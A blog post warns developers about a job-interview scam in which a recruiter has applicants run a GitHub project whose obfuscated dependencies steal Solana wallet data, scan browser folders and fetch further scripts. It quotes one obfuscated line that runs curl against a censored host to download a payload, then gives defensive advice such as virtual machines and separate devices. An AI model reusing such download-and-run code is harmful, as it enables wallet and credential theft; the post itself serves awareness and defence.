Don't miss this free $200 USD credit (Valid for 60 days) on DO, launch your idea now

You have no excuses now, use this free credit to launch your projects now on Digital Ocean, you're free to spend it whenever you want within the following 60 days.

Table of contents

You Could Lose All Your Crypto In a Job Interview

You Could Lose All Your Crypto In a Job Interview

The other day I was browsing Elon Musk’s political propaganda machine, also known as X, and came across this gem of human shamelessness, an interviewer who nearly hacked one of his applicants.

Running malware in job interviews.

The story goes like this: you’re in need of a job, you’re attending the interview remotely, the recruiter asks you to clone a Github library to find bugs in the code, an average interview for a developer position, all looks normal up to this point. Of course you, in need of a good job, decide to go through with the process.

Well, this guy was smart enough to read the code to be executed before blindly executing his voluminous node_modules directory. And what did he find? A succulent and delicious minimized code, also obfuscated and with hints of putting your computer to mine cryptocurrencies.

Our friend was like George, curious, so he reformated the code and found:

  • Lines that appear to search and read the contents of Solana wallets.
  • Scripts that scan browser directories.
  • API calls to an IP address , with no domain, some with no response at all and some that download obfuscated Python scripts (I guess it follows up the hacking process by installing a backdoor or some RAT).

If you want to infect yourself read the code, visit the github repository , I take no responsibility for anything.

_0x42b722(curl -Lo + _0x157519 + “\” + http://<censored>/pdown” + “\””, (_0x204dd7, _0x6e1c16, _0x52b515) => {
  if (_0x204dd7) {
    _0x517b73 = 0;
    return void _0x70af27();
  })

How do we avoid falling into these traps?

I don’t plan to stand alone in the drama. This is about offering some practical solutions so that script kiddies don’t make fun of you:

Use a different device.

The most comfortable option, but also the most expensive, keep your devices separate, use one computer for work and technical interviews and another for your personal stuff, cryptocurrencies included.

Read the code, whenever possible.

Recruiter sends you a script? Examine it carefully before you run it. Yes, I know, sometimes the code is too long or obfuscated, but if you have some experience, you can quickly examine the screen with your eyes and spot the most obvious red flags. Of course, you can’t waste all afternoon on this either especially if you’re in a real interview or value your time.

Use a virtual machine.

Mount a virtual machine, either Virtual Box or Gnome Boxes, on Linux, or a completely isolated Docker container , if you don’t mind not having a graphical interface.

Another option available, and my favorite: a live USB with the distribution of your choice (Debian, Fedora, or whatever you want),

That way, the worst that can happen is that they infect your virtual machine and not your real computer with all your personal information. Just be careful with shared volumes! If you mount your hard drive in the VM, you’re toast.

Encrypt your sensitive information.

Here comes in the classic advice from old-school IT veterans: encrypt your important data. If someone manages to access your collection of kitten memes, encrypt them.

I don’t plan to offer details because there is already too much on the internet, Google GPG or read the manual directly, if you are not that familiar with the terminal or don’t care, there are tools like Kleopatra, which make cryptography more intuitive to use.

Don’t run arbitrary code on your personal machine.

Do you have better ideas to protect us from these practices? Drop your tips on social media and tag me. I look forward to adding your suggestions to the post.

If you want to read the full story give Elon’s blog a visit…. I mean X.

Eduardo Zepeda
Web developer and GNU/Linux enthusiast. I believe in choosing the right tool for the job and that simplicity is the ultimate sophistication. Better done than perfect. I also believe in the goodness of cryptocurrencies outside of monetary speculation.
Read more